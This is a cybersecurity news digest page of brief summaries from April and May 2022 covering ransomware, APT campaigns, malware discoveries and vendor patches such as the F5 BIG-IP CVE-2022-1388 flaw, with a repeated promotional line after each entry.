Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Critical Infrastructure Firms See Cyber-Attacks Surge
Date: 2022-05-10

More than 70% of UK critical national infrastructure (CNI) providers have seen an increase in cyber-attacks since the start of the war in Ukraine, according to new research from Bridewell

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Threat Actors are Actively Exploiting CVE-2022-1388 RCE in F5 BIG-IP
Date: 2022-05-10

Threat actors started massively exploiting the critical remote code execution vulnerability, tracked as CVE-2022-1388, affecting F5 BIG-IP. F5 and CISA released a security advisory last week warning customers to install the latest updates for a variety of products.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

US Government Offers $15m Reward for Info on Conti Actors
Date: 2022-05-09

The US authorities have offered a multimillion-dollar reward for information leading to the identification, arrest and/or conviction of individuals involved in attacks using the Conti ransomware variant. Offered under the Department of State’s Transnational Organized Crime Rewards Program (TOCRP), the money is split into two pots: up to $10m for information on the identity or location of individuals “who hold a key leadership position” in Conti; and up to $5m for info leading to the arrest or conviction of anyone conspiring to use the malware in attacks

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Cyber Attack Halts Production at Ag Equipment Maker AGCO Fendt
Date: 2022-05-09

A cyber attack has disrupted the operations of AGCO/Fendt, a major manufacturer of agricultural equipment, the company has acknowledged. AGCO/Fendt, headquartered in Duluth, Georgia, said in a statement to the Security Ledger that it was the subject of a cybersecurity incident that “has impacted some of our production facilities. We are working to address the issues. Our first priority is to restore those critical activities needed to keep farmers farming.” The company first acknowledged the attack on Thursday, May 5.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Ukrainian CERT Warns Citizens of a New Wave of Attacks Distributing Jester Malware
Date: 2022-05-09

The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of phishing attacks that deploy an information-stealing malware called Jester Stealer on compromised systems. The mass email campaign carries the subject line "chemical attack" and contains a link to a macro-enabled Microsoft Excel file, opening which leads to computers getting infected with Jester Stealer.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Check Your Gems: Rubygems Fixes Unauthorized Package Takeover Bug
Date: 2022-05-09

The RubyGems package repository has fixed a critical vulnerability that would allow anyone to unpublish ("yank") certain Ruby packages from the repository and republish their tainted or malicious versions with the same file names and version numbers.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Costa Rica Declares National Emergency After Conti Ransomware Attacks
Date: 2022-05-09

On Sunday, May 8th, newly elected Costa Rican President Rodrigo Chaves declared a national emergency following cyber-attacks from the Conti Ransomware group on multiple government bodies.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

GitHub Announces Mandatory 2FA for Code Contributors
Date: 2022-05-06

Code hosting platform GitHub on Wednesday said it would make it mandatory for software developers to use at least one form of two-factor authentication (2FA) by the end of 2023. The Microsoft-owned platform has been supporting 2FA for years and is allowing users to use physical and virtual security keys, Time-based One-Time Password (TOTP) authenticator apps, and SMS as a second form of authentication.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Ukraine’s IT Army is Disrupting Russia's Alcohol Distribution
Date: 2022-05-06

Hacktivists operating on the side of Ukraine have focused their DDoS attacks on a portal that is considered crucial for the distribution of alcoholic beverages in Russia. DDoS (distributed denial of service) attacks are collective efforts to overwhelm servers with large volumes of garbage traffic and bogus requests, rendering them unable to serve legitimate visitors.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Security Researchers: Here’s How the Lazarus Hackers Start Their Attacks
Date: 2022-05-06

The Lazarus hacking group is one of the top cybersecurity threats from North Korea, recently catching the attention of the US government for massive cryptocurrency heists. Now researchers at NCCGroup have pieced together a few of the tools and techniques Lazarus hackers have been using recently, including social engineering on LinkedIn, messaging US defense contractor targets on WhatsApp, and installing the malicious downloader LCPDot.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Microsoft, Apple and Google Team Up on Passwordless Standard
Date: 2022-05-06

Some of the world’s biggest tech companies are throwing considerable weight behind a common passwordless sign-in standard that could finally signal the end of static credentials for many users. Apple, Microsoft and Google announced plans to support the FIDO Alliance and World Wide Web Consortium (W3C) standard, making it easier for websites and apps to deliver end-to-end passwordless authentication via fingerprint/face scan or device PIN.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

New Raspberry Robin Worm Uses Windows Installer to Drop Malware
Date: 2022-05-06

Red Canary researchers have discovered a new wormable Windows malware that spreads through USB drives. They have dubbed the malware Raspberry Robin and first observed the activity back in September 2021. Using detection tools on customer networks, Red Canary saw the malware spreading in the technology and manufacturing sectors.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Cisco Issues Patches for 3 New Flaws Affecting Enterprise NFVIS Software
Date: 2022-05-05

Cisco Systems on Wednesday shipped security patches to contain three flaws impacting its Enterprise NFV Infrastructure Software (NFVIS) that could permit an attacker to fully compromise and take control over the hosts.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Decade-Old Bugs Discovered in Avast, AVG Antivirus Software
Date: 2022-05-05

Researchers have disclosed two high-severity vulnerabilities in Avast and AVG antivirus products which have gone undetected for ten years.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

New NetDooka Malware Spreads via Poisoned Search Results
Date: 2022-05-05

A new malware framework known as NetDooka has been discovered being distributed through the PrivateLoader pay-per-install (PPI) malware distribution service, allowing threat actors full access to an infected device. This previously undocumented malware framework features a loader, a dropper, a protection driver, and a powerful RAT component that relies on a custom network communication protocol.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

New NetDooka Malware Spreads via Poisoned Search Results
Date: 2022-05-05

A new malware framework known as NetDooka has been discovered being distributed through the PrivateLoader pay-per-install (PPI) malware distribution service, allowing threat actors full access to an infected device. This previously undocumented malware framework features a loader, a dropper, a protection driver, and a powerful RAT component that relies on a custom network communication protocol.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

FBI says Business Email Compromise is a $43 Billion Scam
Date: 2022-05-05

The Federal Bureau of Investigation (FBI) said today that the amount of money lost to business email compromise (BEC) scams continues to grow each year, with a 65% increase in the identified global exposed losses between July 2019 and December 2021. From June 2016 until July 2019, IC3 received victim complaints regarding 241,206 domestic and international incidents, with a total exposed dollar loss of $43,312,749,946

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

F5 Warns its Customers of Tens of Flaws in its Products
Date: 2022-05-05

F5 and US-CERT released security notifications this morning, warning of a handful of vulnerabilities in various products. In total the company addressed 43 vulnerabilities, the most severe being tracked as CVE-2022-1388. It received a CVSS scored of 9.8 and allows an unauthenticated attacker to exploit BIG-IP systems through the management port. Using the system they can execute arbitrary system commands, create or deleted files, or disable services.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

State-Backed Chinese Hackers Target Russia
Date: 2022-05-04

Financially motivated and state-sponsored actors around the globe continue to use the war in Ukraine as a lure for phishing campaigns, with Chinese groups targeting Russia of late, according to Google. The tech giant’s Threat Analysis Group (TAG) claimed in its new quarterly bulletin that the usual governments of China, Iran, North Korea and Russia were responsible for many of the attacks recorded over the period.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Unpatched DNS Bug Affects Millions of Routers and IoT Devices
Date: 2022-05-04

An Unpatched DNS bug in a popular C standard library is putting millions of IoT devices at risk of DNS poisoning attacks. Using the vulnerability, a threat actor may be able to spoof or redirect a victim to a malicious website under their control.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Chinese Hackers Caught Stealing Intellectual Property from Multinational Companies
Date: 2022-05-04

An elusive and sophisticated cyberespionage campaign orchestrated by the China-backed Winnti group has managed to fly under the radar since at least 2019. Dubbed "Operation CuckooBees" by Israeli cybersecurity company Cybereason, the massive intellectual property theft operation enabled the threat actor to exfiltrate hundreds of gigabytes of information. Targets included technology and manufacturing companies primarily located in East Asia, Western Europe, and North America.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Conti, Revil, Lockbit Ransomware Bugs Exploited to Block Encryption
Date: 2022-05-04

Hackers commonly exploit vulnerabilities in corporate networks to gain access, but a researcher has turned the table by finding exploits in the most common ransomware and malware being distributed today. Malware from notorious ransomware operations like Conti, the revived REvil, the newcomer Black Basta, the highly active LockBit, or AvosLocker, all came with security issues that could be exploited to stop the final and most damaging step of the attack, file encryption.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Pro-Ukraine Hackers Use Docker Images to DDoS Russian Sites
Date: 2022-05-04

Docker images with a download count of over 150,000 have been used to run distributed denial-of-service (DDoS) attacks against a dozen Russian and Belarusian websites managed by the government, military, and news organizations. Behind the incidents are believed to be pro-Ukrainian actors such as hacktivists, likely backed by the country's IT Army.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Aruba and Avaya Network Switches Are Vulnerable to RCE Attacks
Date: 2022-05-03

Security researchers have discovered five vulnerabilities in network equipment from Aruba (owned by HP) and Avaya (owned by ExtremeNetworks), that could allow malicious actors to execute code remotely on the devices. The damage caused by a successful attack ranges from data breach and complete device takeover to lateral movement and overriding network segmentation defenses.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Green - Chinese Cyber-espionage Group Moshen Dragon Targets Asian Telcos
Date: 2022-05-03

Researchers have identified a new cluster of malicious cyber activity tracked as Moshen Dragon, targeting telecommunication service providers in Central Asia. While this new threat group has some overlaps with "RedFoxtrot" and "Nomad Panda," including the use of ShadowPad and PlugX malware variants, there are enough differences in their activity to follow them separately.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection
Date: 2022-05-03

Cybersecurity researchers have disclosed a new variant of the AvosLocker ransomware that disables antivirus solutions to evade detection after breaching target networks by taking advantage of unpatched security flaws.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

SOLARDEFLECTION C2 Infrastructure Used by NOBELIUM in Company Brand Misuse
Date: 2022-05-03

Recorded Future’s Insikt Group continues to monitor Russian state-sponsored cyber espionage operations targeting government and private sector organizations across multiple geographic regions. From mid-2021 onwards, Recorded Future’s midpoint collection revealed a steady rise in the use of NOBELIUM infrastructure tracked by Insikt Group as SOLARDEFLECTION, which encompasses command and control (C2) infrastructure. In this report, we highlight trends observed by Insikt Group while monitoring SOLARDEFLECTION infrastructure and the recurring use of typosquat domains by its operators.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

UNC3524 APT Uses IP Cameras to Deploy Backdoors and Target Exchange
Date: 2022-05-03

Mandiant researchers discovered a new APT group, tracked as UNC3524, that heavily targets the emails of employees that focus on corporate development, mergers and acquisitions, and large corporate transactions. Once gained initial access to the target systems, UNC3524 deployed a previously unknown backdoor tracked by Mandiant researchers as QUIETEXIT. The QUIETEXIT backdoor borrows the code from the open-source Dropbear SSH client-server software. The threat actors deployed QUIETEXIT on network appliances within the target network, including load balancers and wireless access point controllers.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Chinese "Override Panda" Hackers Resurface With New Espionage Attacks
Date: 2022-05-02

A Chinese state-sponsored espionage group known as Override Panda has resurfaced in recent weeks with a new phishing attack with the goal of stealing sensitive information. "The Chinese APT used a spear-phishing email to deliver a beacon of a Red Team framework known as 'Viper,'" Cluster25 said in a report published last week. "The target of this attack is currently unknown but with high probability, given the previous history of the attack perpetrated by the group, it might be a government institution from a South Asian country."

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Here's a New Tool That Scans Open-Source Repositories for Malicious Packages
Date: 2022-05-02

The Open Source Security Foundation (OpenSSF) has announced the initial prototype release of a new tool that's capable of carrying out dynamic analysis of all packages uploaded to popular open source repositories. Called the Package Analysis project, the initiative aims to secure open-source packages by detecting and alerting users to any malicious behavior with the goal of bolstering the security of the software supply chain and increasing trust in open-source software.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Russian Hackers Compromise Embassy Emails to Target Governments
Date: 2022-05-02

Security analysts have uncovered a recent phishing campaign from Russian hackers known as APT29 (Cozy Bear or Nobelium) targeting diplomats and government entities in Europe, the Americas, and Asia. The APT29 is a state-sponsored actor that focuses on cyberespionage and has been active since at least 2014. Its targeting scope is determined by current Russian geopolitical strategic interests.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

REvil Ransomware Returns: New Malware Sample Confirms Gang is Back
Date: 2022-05-02

“The notorious REvil ransomware operation has returned amidst rising tensions between Russia and the USA, with new infrastructure and a modified encryptor allowing for more targeted attacks”. The REvil ransomware group was shut down by law enforcement back in October of 2021. Various members of the group was arrested and their Tor servers were seized. There has been rumors that the groups Tor servers were back online, and this week we are seeing reports that their previous websites are now redirecting visitors to a new unnamed ransomware operation.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Hackers Fool Major Tech Companies Into Handing Over Data of Women and Minors to Abuse
Date: 2022-04-29

Some major tech companies have unwittingly opened harassment and exploitation opportunities to the women and children who they have pledged to protect. This happened because they provided information in response to emergency data requests from legitimate law enforcement accounts that hackers had compromised. This finding came from four federal law enforcement agencies and a couple of industry investigators.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Ongoing DDoS Attacks From Compromised Sites Hit Ukraine
Date: 2022-04-29

Ukraine ‘s computer emergency response team (CERT-UA) announced that it is investigating, along with the National Bank of Ukraine (CSIRT-NBU), ongoing DDoS (distributed denial of service) attacks targeting pro-Ukraine sites and the government web portal.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Microsoft Fixes ExtraReplica Azure Bugs That Exposed User Databases
Date: 2022-04-29

Microsoft has addressed a chain of critical vulnerabilities found in the Azure Database for PostgreSQL Flexible Server that could let malicious users escalate privileges and gain access to other customers' databases after bypassing authentication.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

EmoCheck Now Detects New 64-bit Versions of Emotet Malware
Date: 2022-04-29

The Japan CERT has released a new version of their EmoCheck utility to detect new 64-bit versions of the Emotet malware that began infecting users this month. Emotet is one of the most actively distributed malware spread through emails using phishing emails with malicious attachments, including Word/Excel documents, Windows shortcuts, ISO files, and password-protected zip files. The phishing emails use creative lures to trick users into opening the attachments, including reply-chain emails, shipping notices, tax documents, accounting reports, or even holiday party invites.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

FIN7 BadUSB
Date: 2022-04-28

The criminal group FIN7 has been mailing malware-ridden USBs to various entities in the transport, insurance, and defense industries under the guise that they originated from a trusted source, such as Amazon and the US Department of Health and Human Services. Those from the former were supposedly gift vouchers, while the latter claimed to include new COVID guidelines. FIN7’s badUSB attacks serve as a reminder of two key vulnerabilities present among all organizations.

Contact LA-Cyber.com For Full Threat Report, Analyst Comments & Mitigation Steps

Side Bar

Cyber Security Cafe is here as a service to bring needed Cyber Security information to the general public. We offer no services, other than information that may help protect you.

Project Details

(none at this time)